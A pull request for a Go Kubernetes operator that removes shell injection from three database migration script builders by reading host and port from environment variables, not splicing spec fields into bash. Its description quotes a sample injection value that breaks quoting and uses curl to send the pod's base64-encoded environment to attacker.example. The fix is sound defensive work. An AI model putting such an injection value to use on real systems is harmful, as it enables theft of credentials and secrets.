### PR TITLE
fix(security): eliminate shell injection via spec.database.host in migration scripts [1]

### DIFF
--- a/internal/resources/migration.go
+++ b/internal/resources/migration.go
@@ -116,7 +116,7 @@ func ROSMigrationJob(cfg *costv1alpha1.CostManagementServiceConfig, imageTag str
 		EnvVal("LOG_LEVEL", "INFO"),
 	}
 
-	script := rosMigrationScript(host, int32String(port))
+	script := rosMigrationScript()
 
 	vols := []corev1.Volume{{
 		Name:         "tmp",
@@ -129,11 +129,11 @@ func ROSMigrationJob(cfg *costv1alpha1.CostManagementServiceConfig, imageTag str
 	)
 }
 
-func rosMigrationScript(host, port string) string {
+func rosMigrationScript() string {
+	// DB_HOST and DB_PORT are injected as env vars by rosDBEnv() — never
+	// interpolate CR spec fields into shell source (shell injection risk).
 	return `set -e
 echo "=== ROS Database Migrations ==="
-DB_HOST="${DB_HOST:-` + host + `}"
-DB_PORT="${DB_PORT:-` + port + `}"
 ELAPSED=0
 echo "Waiting for database at ${DB_HOST}:${DB_PORT}..."
 while true; do
@@ -160,7 +160,7 @@ func RBACMigrationJob(cfg *costv1alpha1.CostManagementServiceConfig, imageTag st
 	image := cfg.Spec.RBAC.Image.Repository + ":" + cfg.Spec.RBAC.Image.Tag
 
 	env := rbacMigrationEnv(cfg)
-	script := rbacMigrationScript(DatabaseHost(cfg), int32String(cfg.Spec.Database.Port))
+	script := rbacMigrationScript()
 
 	vols := []corev1.Volume{{
 		Name:         "tmp",
@@ -182,16 +182,16 @@ func rbacMigrationEnv(cfg *costv1alpha1.CostManagementServiceConfig) []corev1.En
 	)
 }
 
-func rbacMigrationScript(host, port string) string {
+func rbacMigrationScript() string {
+	// DATABASE_HOST and DATABASE_PORT are injected as env vars by rbacMigrationEnv()
+	// — never interpolate CR spec fields into shell source (shell injection risk).
 	return `set -e
 echo "=== insights-rbac migration job ==="
-DB_HOST="${DATABASE_HOST:-` + host + `}"
-DB_PORT="${DATABASE_PORT:-` + port + `}"
 ELAPSED=0
-echo "Waiting for database at ${DB_HOST}:${DB_PORT}..."
+echo "Waiting for database at ${DATABASE_HOST}:${DATABASE_PORT}..."
 while true; do
   if [ $ELAPSED -ge 300 ]; then echo "ERROR: DB not ready after 300s"; exit 1; fi
-  if timeout 5 bash -c "cat < /dev/null > /dev/tcp/${DB_HOST}/${DB_PORT}" 2>/dev/null; then break; fi
+  if timeout 5 bash -c "cat < /dev/null > /dev/tcp/${DATABASE_HOST}/${DATABASE_PORT}" 2>/dev/null; then break; fi
   echo "DB not reachable (${ELAPSED}s elapsed), waiting..."
   sleep 5; ELAPSED=$((ELAPSED + 5))
 done
@@ -379,7 +379,7 @@ func AdminBootstrapJob(cfg *costv1alpha1.CostManagementServiceConfig, imageTag s
 		EnvVal("SYNC_ORG_ID", id.OrgID),
 		EnvVal("SYNC_ACCOUNT_NUMBER", id.AccountNumber),
 	)
-	script := rbacAdminBootstrapScript(DatabaseHost(cfg), int32String(cfg.Spec.Database.Port))
+	script := rbacAdminBootstrapScript()
 	vols := []corev1.Volume{{
 		Name:         "tmp",
 		VolumeSource: corev1.VolumeSource{EmptyDir: &corev1.EmptyDirVolumeSource{}},
@@ -391,19 +391,19 @@ func AdminBootstrapJob(cfg *costv1alpha1.CostManagementServiceConfig, imageTag s
 	)
 }
 
-func rbacAdminBootstrapScript(host, port string) string {
+func rbacAdminBootstrapScript() string {
+	// DATABASE_HOST and DATABASE_PORT are injected as env vars by rbacMigrationEnv()
+	// — never interpolate CR spec fields into shell source (shell injection risk).
 	return `set -e
 echo "=== insights-rbac admin bootstrap job ==="
-DB_HOST="${DATABASE_HOST:-` + host + `}"
-DB_PORT="${DATABASE_PORT:-` + port + `}"
 ELAPSED=0
 echo "Username: ${SYNC_USERNAME}"
 echo "Org ID: ${SYNC_ORG_ID}"
 echo "Account Number: ${SYNC_ACCOUNT_NUMBER}"
-echo "Waiting for database at ${DB_HOST}:${DB_PORT}..."
+echo "Waiting for database at ${DATABASE_HOST}:${DATABASE_PORT}..."
 while true; do
   if [ $ELAPSED -ge 300 ]; then echo "ERROR: DB not ready after 300s"; exit 1; fi
-  if timeout 5 bash -c "cat < /dev/null > /dev/tcp/${DB_HOST}/${DB_PORT}" 2>/dev/null; then break; fi
+  if timeout 5 bash -c "cat < /dev/null > /dev/tcp/${DATABASE_HOST}/${DATABASE_PORT}" 2>/dev/null; then break; fi
   echo "DB not reachable (${ELAPSED}s elapsed), waiting..."
   sleep 5; ELAPSED=$((ELAPSED + 5))
 done

--- a/internal/resources/migration_rbac_test.go
+++ b/internal/resources/migration_rbac_test.go
@@ -10,7 +10,7 @@ import (
 )
 
 func TestRBACMigrationScriptSeedsCostManagementAndSources(t *testing.T) {
-	script := rbacMigrationScript("db", "5432")
+	script := rbacMigrationScript()
 	for _, want := range []string{
 		"sources:*:*",
 		"Cost Administrator",


### PR DESCRIPTION
## Summary

Fixes **Critical finding #1** from the GA readiness review: shell command injection via `spec.database.host` in three migration script builders.

**Root cause:** `rosMigrationScript()`, `rbacMigrationScript()`, and `rbacAdminBootstrapScript()` concatenated CR spec fields directly into bash script strings executed as `Command: []string{"bash", "-c", script}`. A hostile value like `` x"; curl attacker.example/$(env|base64); echo " `` breaks the quoting and executes arbitrary shell inside migration pods holding DB/ROS/RBAC credential secrets.

**Fix:** Remove all string interpolation of spec fields from script bodies. DB host and port are already injected as environment variables by `rosDBEnv()` / `rbacMigrationEnv()` — the scripts now read them from `${DB_HOST}` / `${DATABASE_HOST}` at runtime, exactly like the original Koku migration script has always done.

**Bonus fix:** The RBAC migration script was using `${DB_HOST}` but `rbacMigrationEnv()` sets `DATABASE_HOST` — a name mismatch that would have caused the DB wait loop to hang.

## Test plan
- `go build ./...` passes
- `go test ./internal/resources/...` passes (updated `TestRBACMigrationScriptSeedsCostManagementAndSources` to match new no-arg signature)
- CI green

## Summary by Sourcery

Address shell injection risk in ROS and RBAC migration/admin bootstrap jobs by removing direct interpolation of CR database host/port into bash scripts and relying on environment variables instead.

Bug Fixes:
- Prevent shell command injection via spec.database.host in ROS migration, RBAC migration, and RBAC admin bootstrap scripts.
- Fix RBAC migration/admin scripts to consistently use DATABASE_HOST/DATABASE_PORT environment variables in DB readiness checks, avoiding mismatched variable names that could hang the wait loop.

Tests:
- Update RBAC migration script test to reflect the new no-argument script builder signature.